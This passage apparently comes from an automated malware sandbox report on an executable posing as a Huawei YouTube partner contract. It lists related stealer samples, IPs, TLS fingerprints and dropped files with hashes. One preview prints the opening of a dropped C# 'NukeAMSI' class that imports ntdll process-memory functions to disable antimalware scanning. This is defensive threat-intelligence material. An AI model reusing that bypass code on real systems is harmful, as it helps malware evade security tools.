                                                                                                                                                                                            https://www.buildwithbrick.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                            ZIOpctBE0o.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            CLOUDFLARENETUShttps://login.issue.autonews.com/custompages/crain/login.aspx?pbid=1bfa4d66-4500-4052-8d12-b04775c24d16Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                            • 172.67.26.11
                                                                                                                                                                                            fortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                            http://link.shoppermeet.net/deep-link?clickid=01H1RW78ZQF6QB5RM2RB5KGV69&geo=us&ip=66.249.66.3&merchantid=108994&propertyid=417896&publisherkey=0f210dc9-c1ef-4153-bd53-8fb98995be03&subid=01GWHNP35ZW7N25QKXMEA9EHVQ&url=%68%74%74%70%73%3A%2F%2F%6F%43%35%4F%43%66%51%50%46%54%30%75%4B%62%59%48%6D%41%67%54%2E%62%72%69%67%68%74%6E%65%78%73%74%2E%72%75%2F%70%61%78%36%6C%66%31%2F%23%23sap@virtualintelligencebriefing.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.70.161
                                                                                                                                                                                            fortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.21.32.1
                                                                                                                                                                                            Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            https://www.buildwithbrick.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                            ZIOpctBE0o.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            TUT-ASUS Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            BAMParser.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Fatality-unpadded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Xworm-V5.6.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            KNT3NUxTeD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1

                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0efortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            fortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            https://www.buildwithbrick.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            BN.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            sHsYUp3BAs.exeGet hashmaliciousDragonForceBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            cool.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            • 149.154.167.220

                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                            No context

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                            Preview:@...e...........................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2025-02-17-13-35-39-screenshot.png

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):693735
                                                                                                                                                                                            Entropy (8bit):7.9279444630284495
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:fn+jhBLpHfnjpgW2/N++GVfcstiMh11QmwTH4M1QLr7r4vNjpLmmRdSo5dunWFJ:fn+PFfnyW2/2fr7jQL464eN1FxXunWFJ
                                                                                                                                                                                            MD5:AA166269F78A0D3FF73EE14552465A67
                                                                                                                                                                                            SHA1:94A7B5A71FDCF2C77E3437EBBDCDEE3A9051DA88
                                                                                                                                                                                            SHA-256:7A27323670CD8385C0C6B38AA48062602F919B7DC6F4D3D15909A7B03990CFBE
                                                                                                                                                                                            SHA-512:0206BD39259137338152F6851CF84C32346CDD6EFA3EA37C29D2BD0CF1FBF7B3B4FAF0E5296D6A922BB7BC531FED86F57C2A4F6B8556B601FDCCDA639AB0AF4A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....]....s.U.j..~]...rU..]U..W]...z4mWu.. ...2.9al.D...$..`\..d..HB.$..J.@`.....o...w.u.I..+....7.Zs..>.J ..\{.js...e}.^oB...[Q......C.x.c.....S. ......Q|#.Q...KFcOK.y...].j...X/..R?{d..zeD...S.....3.nPj..tD.....O.......S?eM[.N.......X.....#.N.>..WV..q/...c^.]~.BO........o..}......}.yn....mI.E\...o.=.A.7...;.....S.~..':.......[.........G......F@.K.U...5._..../<.....}.D.g......b..{4..h.X>..a.U}.......}p..<P...C.....C..ea.g......B...'..Z.Zb.......d..y.1{.../.....4...1...Z.....(.80.#...{.0.<..[..o..Ul.A.....=._....7A_...`....$...$../....[.O...C..{C}.E.....'>~.xo1.. .v.K..3!...<....~m..i.q......X_..m.q..sQ..W..q..qn....n...}...{.}c....3..#...P.......g.{.}....].`.....mm..R.=.$.........?......vOj5Vl`...q.].N0....%.w........qW....lB..y.<.X....x..w....L..3..F...Q..9.0nz...A{..v...fZ.....V.b.w..).OLy.8......;.1.O...-....)...m).\].k1..i.qq,&.kN.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RESD333.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Mon Feb 17 19:46:57 2025, 1st section name ".debug$S"
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1340
                                                                                                                                                                                            Entropy (8bit):4.006116877413264
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:HbK9ocaKp+tbaHywKKjmNII+ycuZhNbYakSINPNnqSed:LZA3pKMmu1ulbYa3IXqS+
                                                                                                                                                                                            MD5:12452F6B796ED16235E4DCE4C4E4E82D
                                                                                                                                                                                            SHA1:CDCDB19887CB10FA94DF84F60B9543965B50DFD9
                                                                                                                                                                                            SHA-256:83A3F9E4D64EA15E03A66F67BA6ED99A92B53CF019E58A67B3372D84138B6829
                                                                                                                                                                                            SHA-512:DB7BB2DE4BEC213188B02AB7896F2E716DD91C8AA27ADAC1F34A819D3CB2C7C86B950D4BCCBAF4D090D319C9DC9D7AF63C29CE10E2E2DFABD54670582C6D604A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:L...1..g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP.....................C.n..(..J...........7.......C:\Users\user\AppData\Local\Temp\RESD333.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.w.r.y.u.2.y.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0devzqij.sr5.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2kdpcccf.cvv.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dovhy5a.21k.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4i3zmzts.l5p.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2frbbvz.tlu.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjwmxkwv.e0u.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jppunsa2.yp2.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sm4eivnv.3v5.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wkrezchb.m21.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zszf114d.xp4.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                            Entropy (8bit):3.112732027448755
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry/BYak7YnqqcBNPN5Dlq5J:+RI+ycuZhNbYakSINPNnqX
                                                                                                                                                                                            MD5:9A1A14AA43816E0CCBB328CCA0F94AC6
                                                                                                                                                                                            SHA1:80BA4EA115B0201CA3F36C3824D913845251E645
                                                                                                                                                                                            SHA-256:11039D97294F8DEBA7AF9B26619D57686F129AA362057E976C4D8907F515FA34
                                                                                                                                                                                            SHA-512:C34B4C328C6A76D584CE470A3D4ACCD50BEC1C9F0C55A10995E33F2CB9BE4DDE13838158FC3BDA544F18EB7DB95F8295BAE7992D9B56225EA4C3B1073C3C62FD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.w.r.y.u.2.y.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.w.r.y.u.2.y.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.0.cs

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2251
                                                                                                                                                                                            Entropy (8bit):5.037863634769049
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:JoOuOAXQbx7TBdBLMUgs94+gl+IC+YrI5IFfRW8:JoOgacG3U1cU8
                                                                                                                                                                                            MD5:2C374853E019C145F1168AD3528E727A
                                                                                                                                                                                            SHA1:7D0F43BF5FFBA8C166D450FF3096C77EB51B118E
                                                                                                                                                                                            SHA-256:87CF3574FF2F8C971698099C7AEBEA76E7DF657E063B384A07BD31DE28A5BDAF
                                                                                                                                                                                            SHA-512:4AEC3D17CB3D22212ED1E87C01144729FD49EA65963C75CF18876516140303956D3933D1044F13F33D2A551E5F7B61A084350A1A1E727FBA56F81763EFFC1DAE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class NukeAMSI..{.. public const int PROCESS_VM_OPERATION = 0x0008;.. public const int PROCESS_VM_READ = 0x0010;.. public const int PROCESS_VM_WRITE = 0x0020;.. public const uint PAGE_EXECUTE_READWRITE = 0x40;.... // NtOpenProcess: Opens a handle to a process... [DllImport("ntdll.dll")].. public static extern int NtOpenProcess(out IntPtr ProcessHandle, uint DesiredAccess, [In] ref OBJECT_ATTRIBUTES ObjectAttributes, [In] ref CLIENT_ID ClientId);.... // NtWriteVirtualMemory: Writes to the memory of a process... [DllImport("ntdll.dll")].. public static extern int NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, uint NumberOfBytesToWrite, out uint NumberOfBytesWritten);.... // NtClose: Closes an open handle... [DllImport("ntdll.dll")].. public static extern int NtClose(IntPtr Handle);.... // LoadLibrary: Loads the specified mod

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):375
                                                                                                                                                                                            Entropy (8bit):5.243693707189317
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fpPqa9BUzxs7+AEszIN723fpPqa9bn:p37Lvkmb6K2aBP1wWZETaBP1t
                                                                                                                                                                                            MD5:4757EF9DB588F9D8BB6E70DF3E501B75
                                                                                                                                                                                            SHA1:8D67673F9C2F592B0A6976833F0BE64DCDAB8BB7
                                                                                                                                                                                            SHA-256:7D7092D3B45D6322AAD480B12C23D262B263166B171A7A836DADF9AFC7BA9875
                                                                                                                                                                                            SHA-512:2DFADF82638840AC9322375CA6748C00628BA5400769AE92CB080509C8CEA7BB383BB036275F2F11381D9BB233648114EBB8828403BB054F3520B3D993708656
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.0.cs"

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
